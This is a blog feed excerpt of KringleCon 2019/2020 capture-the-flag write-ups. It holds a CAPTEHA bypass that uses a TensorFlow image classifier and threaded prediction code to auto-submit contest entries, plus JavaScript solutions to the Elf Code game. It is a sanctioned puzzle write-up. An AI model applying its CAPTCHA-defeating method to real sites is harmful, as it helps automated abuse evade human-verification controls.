&lt;p>On to the next one! 😎&lt;/p></description></item><item><title>Frido Sleigh contest</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective8/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective8/</guid><description>&lt;h2 id="can-i-has-cookiez">Can I has cookiez?&lt;/h2>
&lt;p>After talking with Krampus in the Steam Tunnels, you realise that he knows a lot about what is going on at Elf Uni. But before he is ready to share any intel, you need to earn his trust&amp;hellip; so he asks you to win the Frido Sleigh contest, which will award him a lifetime supply of cookies. Sadly, however, the contest uses a CAPTEHA challenge, which stands for &lt;code>Completely Automated Public Turing test to tell Elves and Humans Apart&lt;/code>. Krampus is not an elf, and neither are you, so you will need something advanced enough to fool the CAPTEHA and bypass it &amp;hellip;&lt;/p>
&lt;blockquote>
&lt;p>But, before I can tell you more, I need to know that I can trust you.
Tell you what – if you can help me beat the Frido Sleigh contest (Objective 8), then I&amp;rsquo;ll know I can trust you.
The contest is here on my screen and at fridosleigh.com.
No purchase necessary, enter as often as you want, so I am!
They set up the rules, and lately, I have come to realize that I have certain materialistic, cookie needs.
Unfortunately, it&amp;rsquo;s restricted to elves only, and I can&amp;rsquo;t bypass the CAPTEHA.
(That&amp;rsquo;s Completely Automated Public Turing test to tell Elves and Humans Apart.)
I&amp;rsquo;ve already cataloged 12,000 images and decoded the API interface.
Can you help me bypass the CAPTEHA and submit lots of entries?&lt;/p>
&lt;/blockquote>
&lt;p>Links from the hint:&lt;/p>
&lt;ul>
&lt;li>Frido Sleigh Contest: &lt;a href="https://fridosleigh.com/">https://fridosleigh.com/&lt;/a>&lt;/li>
&lt;li>CAPTEHA images: &lt;a href="https://downloads.elfu.org/capteha_images.tar.gz">https://downloads.elfu.org/capteha_images.tar.gz&lt;/a>&lt;/li>
&lt;li>Python tool to interact with the API: &lt;a href="https://downloads.elfu.org/capteha_api.py">https://downloads.elfu.org/capteha_api.py&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>&lt;img src="../images/obj8-capteha.png" alt="Frido Sleigh CAPTEHA">&lt;/p>
&lt;p>Basically, your task is to use Machine Learning to train a model that can predict the category of every image in the CAPTEHA challenge, and to use those predictions to submit the correct response before the CAPTEHA times out. The python script provided is of great use, but the core ML code is missing, and it is not trivial to implement. Luckily, there is a KringleCon talk about Machine Learning for Security, which points to a GitHub repository with some very useful code for this missing part:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">https://github.com/chrisjd20/img_rec_tf_ml_demo
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This library implements image recognition based on Machine Learning with TensorFlow, and it is almost a copy-paste solution for the missing parts of the CAPTEHA python script. You just need to train the model on the 12,000 sample images provided by Krampus. The repo provides the training source code, as well as the prediction code you can reuse in the script that interacts with the Frido Sleigh API.&lt;/p>
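&lt;p>The training step boils down to sorting the sample images into one folder per category and pointing the repo&amp;rsquo;s retrain script at that directory. A minimal sketch of the layout; the folder names below are my assumed labels for the six CAPTEHA categories, and the script name and output paths are taken from the demo repo:&lt;/p>

```shell
# Recreate the expected layout with empty folders (the real archive,
# capteha_images.tar.gz, fills these with roughly 12,000 labeled images).
mkdir -p training_images/candy_canes training_images/christmas_trees \
         training_images/ornaments training_images/presents \
         training_images/santa_hats training_images/stockings
ls training_images

# With the images in place, retraining is a single command:
#   python3 retrain.py --image_dir ./training_images/
# which writes /tmp/retrain_tmp/output_graph.pb and output_labels.txt,
# the exact paths loaded by the CAPTEHA script.
```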
&lt;p>A complete solution can be found in my GitHub
&lt;a href="https://github.com/florianakos/kringlecon-capteha" target="_blank" rel="noopener">repo&lt;/a>. The most important part is the integrated ML section:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="n">graph&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">load_graph&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;/tmp/retrain_tmp/output_graph.pb&amp;#39;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="n">labels&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">load_labels&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;/tmp/retrain_tmp/output_labels.txt&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1"># Load up our session&lt;/span>
&lt;span class="n">input_operation&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">graph&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">get_operation_by_name&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;import/Placeholder&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="n">output_operation&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">graph&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">get_operation_by_name&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;import/final_result&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="n">sess&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">tf&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">compat&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">v1&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">Session&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">graph&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">graph&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1"># Can use queues and threading to spead up the processing&lt;/span>
&lt;span class="n">q&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">queue&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">Queue&lt;/span>&lt;span class="p">()&lt;/span>
&lt;span class="c1">#Going to interate over each of our images.&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="n">image&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">b64_images&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="n">image_uuid&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">image&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s2">&amp;#34;uuid&amp;#34;&lt;/span>&lt;span class="p">]&lt;/span>
&lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;Processing Image {}&amp;#39;&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">format&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">image_uuid&lt;/span>&lt;span class="p">))&lt;/span>
&lt;span class="c1"># We don&amp;#39;t want to process too many images at once. 10 threads max&lt;/span>
&lt;span class="k">while&lt;/span> &lt;span class="nb">len&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">threading&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">enumerate&lt;/span>&lt;span class="p">())&lt;/span> &lt;span class="o">&amp;gt;&lt;/span> &lt;span class="mi">10&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="n">time&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">sleep&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mf">0.0001&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1">#predict_image function is expecting png image bytes so we read image as &amp;#39;rb&amp;#39; to get a bytes object&lt;/span>
&lt;span class="n">image_bytes&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">base64&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">b64decode&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">image&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s2">&amp;#34;base64&amp;#34;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="n">threading&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">Thread&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">target&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">predict_image&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">args&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">q&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">sess&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">graph&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">image_bytes&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">image_uuid&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">labels&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">input_operation&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">output_operation&lt;/span>&lt;span class="p">))&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">start&lt;/span>&lt;span class="p">()&lt;/span>
&lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;Waiting For Threads to Finish...&amp;#39;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">while&lt;/span> &lt;span class="n">q&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">qsize&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="o">&amp;lt;&lt;/span> &lt;span class="nb">len&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">b64_images&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="n">time&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">sleep&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mf">0.001&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1">#getting a list of all threads returned results&lt;/span>
&lt;span class="n">prediction_results&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="p">[&lt;/span>&lt;span class="n">q&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">get&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="k">for&lt;/span> &lt;span class="n">x&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="nb">range&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">q&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">qsize&lt;/span>&lt;span class="p">())]&lt;/span>
&lt;span class="c1">#do something with our results... Like print them to the screen.&lt;/span>
&lt;span class="n">predicted_uuids&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="p">[]&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="n">prediction&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">prediction_results&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="n">prediction&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;prediction&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">challenge_image_types&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="n">predicted_uuids&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">append&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">prediction&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;image_uuid&amp;#39;&lt;/span>&lt;span class="p">])&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>When you run the script, don&amp;rsquo;t forget to edit the &lt;code>yourREALemailAddress&lt;/code> variable, as the Frido Sleigh contest will send the code to this real email address.&lt;/p>
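&lt;p>As an aside, the thread-throttling idiom used in the ML section above (cap the number of live threads, collect results through a queue) can be reduced to a standalone sketch, with a dummy function standing in for the real TensorFlow prediction:&lt;/p>

```python
import queue
import threading
import time

def predict(q, item):
    # dummy stand-in for the real TensorFlow prediction call
    q.put(item * 2)

q = queue.Queue()
items = list(range(20))

for item in items:
    # throttle: never allow more than ~10 threads alive at once
    # (threading.enumerate() also counts the main thread)
    while len(threading.enumerate()) > 10:
        time.sleep(0.0001)
    threading.Thread(target=predict, args=(q, item)).start()

# wait until every worker has reported back
while q.qsize() != len(items):
    time.sleep(0.001)

results = [q.get() for _ in range(q.qsize())]
```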
&lt;p>Once you receive the email, it will contain a code that you have to enter in your personal badge to solve this objective. It looks something like this: &lt;code>8Ia8LiZEwvyZr2WO&lt;/code>. After you submit it, Krampus will finally know that he can trust you, and he is ready to share some further information:&lt;/p>
&lt;blockquote>
&lt;p>You did it! Thank you so much. I can trust you!
To help you, I have flashed the firmware in your badge to unlock a useful new feature: magical teleportation through the steam tunnels.
As for those scraps of paper, I scanned those and put the images on my server.
I then threw the paper away.
Unfortunately, I managed to lock out my account on the server.
Hey! You’ve got some great skills. Would you please hack into my system and retrieve the scans?
I give you permission to hack into it, solving Objective 9 in your badge.
And, as long as you&amp;rsquo;re traveling around, be sure to solve any other challenges you happen across.&lt;/p>
&lt;/blockquote></description></item><item><title>ARP Shenanigans</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective10/</link><pubDate>Sun, 27 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective10/</guid><description>&lt;p>&lt;img src="../images/obj10/objective10.png" alt="Objective10">&lt;/p>
&lt;p>Initially, I have absolutely no clue how to get started on this. The description does not mention any elf to get hints from, as it did for most previous challenges. On Discord I see a suggestion to solve the &lt;code>Elf Code&lt;/code> terminal next to &lt;code>Ribb Bonbowford&lt;/code>, so I proceed with that:&lt;/p>
&lt;blockquote>
&lt;p>Hello - my name is Ribb Bonbowford. Nice to meet you!
Are you new to programming? It&amp;rsquo;s a handy skill for anyone in cyber security.
This challenge centers around JavaScript. Take a look at this intro and see how far it gets you!
Ready to move beyond elf commands? Don&amp;rsquo;t be afraid to mix in native JavaScript.&lt;/p>
&lt;/blockquote>
&lt;p>The game itself is quite simple at first:&lt;/p>
&lt;p>&lt;img src="../images/obj10/elfcode-lvl1.png" alt="ElfCode Level 1">&lt;/p>
&lt;p>The task is to guide the character to collect all lollipops, solving challenges along the way to unlock trapdoors and bribe munchkins. My workspace is a small text window where I can write JavaScript code to give instructions to the character. &lt;code>Ribb&lt;/code> has some further helpful thoughts to share:&lt;/p>
&lt;blockquote>
&lt;p>Trying to extract only numbers from an array? Have you tried to filter?
Maybe you need to enumerate an object&amp;rsquo;s keys and then filter?
Getting hung up on number of lines? Maybe try to minify your code.
Is there a way to push array items to the beginning of an array? Hmm&amp;hellip;&lt;/p>
&lt;/blockquote>
&lt;p>Plus a few useful links that appeared in the badge:&lt;/p>
&lt;ul>
&lt;li>Want to learn a useful language?
&lt;a href="https://jgthms.com/javascript-in-14-minutes/" target="_blank" rel="noopener">JavaScript&lt;/a> is a great place to start! You can also test out your code using a
&lt;a href="https://playcode.io/" target="_blank" rel="noopener">JavaScript playground&lt;/a>.&lt;/li>
&lt;li>Did you try the JavaScript primer? There&amp;rsquo;s a great section on looping.&lt;/li>
&lt;li>
&lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/TypedArray/filter" target="_blank" rel="noopener">There&amp;rsquo;s got to be a way&lt;/a> to filter for specific typeof
&lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/TypedArray/filter" target="_blank" rel="noopener">items in an array&lt;/a>. Maybe the
&lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/typeof" target="_blank" rel="noopener">typeof operator could also be useful&lt;/a>?&lt;/li>
&lt;li>
&lt;a href="https://stackoverflow.com/questions/9907419/how-to-get-a-key-in-a-javascript-object-by-its-value" target="_blank" rel="noopener">In JavaScript you can enumerate an object&amp;rsquo;s keys using keys, and filter the array using filter&lt;/a>.&lt;/li>
&lt;/ul>
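&lt;p>The techniques from those hints are easy to try out in a playground. A couple of standalone examples; the sample data here is made up for illustration:&lt;/p>

```javascript
// filter an array down to only its numbers, using typeof
const mixed = [1, "two", 3, null, 5];
const numbersOnly = mixed.filter((x) => typeof x === "number");

// enumerate an object's keys and keep those matching a value
const tiles = { left: "rock", middle: "lollipop", right: "trap" };
const lollipops = Object.keys(tiles).filter((k) => tiles[k] === "lollipop");

console.log(numbersOnly, lollipops);
```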
&lt;p>At first, I am not really getting the hang of it, but by the time I reach Level 4-5 I realize that it&amp;rsquo;s actually a pretty nice game that forces me to think about efficient solutions. Below is my code for the last two bonus levels:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-javascript" data-lang="javascript">&lt;span class="c1">// ---------Level 7 - Spiral -------- //
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="kd">function&lt;/span> &lt;span class="nx">sum&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">dataa&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="kd">var&lt;/span> &lt;span class="nx">sum&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="kd">var&lt;/span> &lt;span class="nx">i&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">i&lt;/span> &lt;span class="o">&amp;lt;&lt;/span> &lt;span class="nx">dataa&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">length&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">i&lt;/span>&lt;span class="o">++&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="kd">var&lt;/span> &lt;span class="nx">j&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">j&lt;/span> &lt;span class="o">&amp;lt;&lt;/span> &lt;span class="nx">dataa&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">].&lt;/span>&lt;span class="nx">length&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">j&lt;/span>&lt;span class="o">++&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="k">typeof&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">dataa&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">][&lt;/span>&lt;span class="nx">j&lt;/span>&lt;span class="p">])&lt;/span> &lt;span class="o">===&lt;/span> &lt;span class="s1">&amp;#39;number&amp;#39;&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="nx">sum&lt;/span> &lt;span class="o">+=&lt;/span> &lt;span class="nx">dataa&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">][&lt;/span>&lt;span class="nx">j&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="p">}&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="k">return&lt;/span> &lt;span class="nx">sum&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="kd">var&lt;/span> &lt;span class="nx">index&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">1&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">i&lt;/span> &lt;span class="o">&amp;lt;=&lt;/span> &lt;span class="mi">8&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">i&lt;/span>&lt;span class="o">++&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">index&lt;/span> &lt;span class="o">%&lt;/span> &lt;span class="mi">4&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveDown&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">index&lt;/span> &lt;span class="o">%&lt;/span> &lt;span class="mi">4&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">1&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveLeft&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">index&lt;/span> &lt;span class="o">%&lt;/span> &lt;span class="mi">4&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">2&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveUp&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">index&lt;/span> &lt;span class="o">%&lt;/span> &lt;span class="mi">4&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">3&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveRight&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">pull_lever&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span> &lt;span class="o">-&lt;/span> &lt;span class="mi">1&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="nx">index&lt;/span>&lt;span class="o">++&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveUp&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">2&lt;/span>&lt;span class="p">);&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveLeft&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">4&lt;/span>&lt;span class="p">);&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">tell_munch&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">sum&lt;/span>&lt;span class="p">);&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveUp&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1">// --------Level 8 - Zig-Zag --------- //
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="kd">function&lt;/span> &lt;span class="nx">parser&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">input&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="kd">var&lt;/span> &lt;span class="nx">solution&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;&amp;#34;&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="kd">var&lt;/span> &lt;span class="nx">i&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">i&lt;/span> &lt;span class="o">&amp;lt;&lt;/span> &lt;span class="nx">input&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">length&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">i&lt;/span>&lt;span class="o">++&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">item&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">input&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">]&lt;/span>
&lt;span class="nb">Object&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">keys&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">item&lt;/span>&lt;span class="p">).&lt;/span>&lt;span class="nx">forEach&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="kd">function&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">key&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">i&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">item&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="nx">key&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">===&lt;/span> &lt;span class="s2">&amp;#34;lollipop&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="nx">solution&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">key&lt;/span> &lt;span class="p">});&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="k">return&lt;/span> &lt;span class="nx">solution&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="kd">var&lt;/span> &lt;span class="nx">leverSum&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span>
&lt;span class="kd">var&lt;/span> &lt;span class="nx">counter&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span> &lt;span class="k">of&lt;/span> &lt;span class="p">[&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="mi">3&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="mi">5&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="mi">7&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="mi">9&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="mi">11&lt;/span>&lt;span class="p">])&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">counter&lt;/span> &lt;span class="o">%&lt;/span> &lt;span class="mi">2&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveRight&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">counter&lt;/span> &lt;span class="o">%&lt;/span> &lt;span class="mi">2&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">1&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveLeft&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">i&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="nx">leverSum&lt;/span> &lt;span class="o">+=&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">get_lever&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">counter&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">pull_lever&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">leverSum&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveUp&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">2&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="nx">counter&lt;/span>&lt;span class="o">++&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">tell_munch&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">parser&lt;/span>&lt;span class="p">);&lt;/span> &lt;span class="nx">elf&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">moveRight&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">11&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;img src="../images/obj10/looping-levels.png" alt="LoopingLevels">&lt;/p>
&lt;p>After all the levels are complete, &lt;code>Ribb&lt;/code> is ready to share some hints about the Santavator:&lt;/p>
&lt;blockquote>
&lt;p>Wow - are you a JavaScript developer? Great work!
Hey, you know, you might use your JavaScript and HTTP manipulation skills to take a crack at bypassing the Santavator&amp;rsquo;s S4.&lt;/p>
&lt;/blockquote>
&lt;p>Wait a second, these are hints for Objective 4!!&lt;/p>
&lt;p>Hmm, never mind it was a fun game after all&amp;hellip; 🤓&lt;/p>
&lt;p>I head back to inspect the Santavator again. My idea at this point is to visit it both as Santa and as my non-Santa character to see how it behaves differently.&lt;/p>
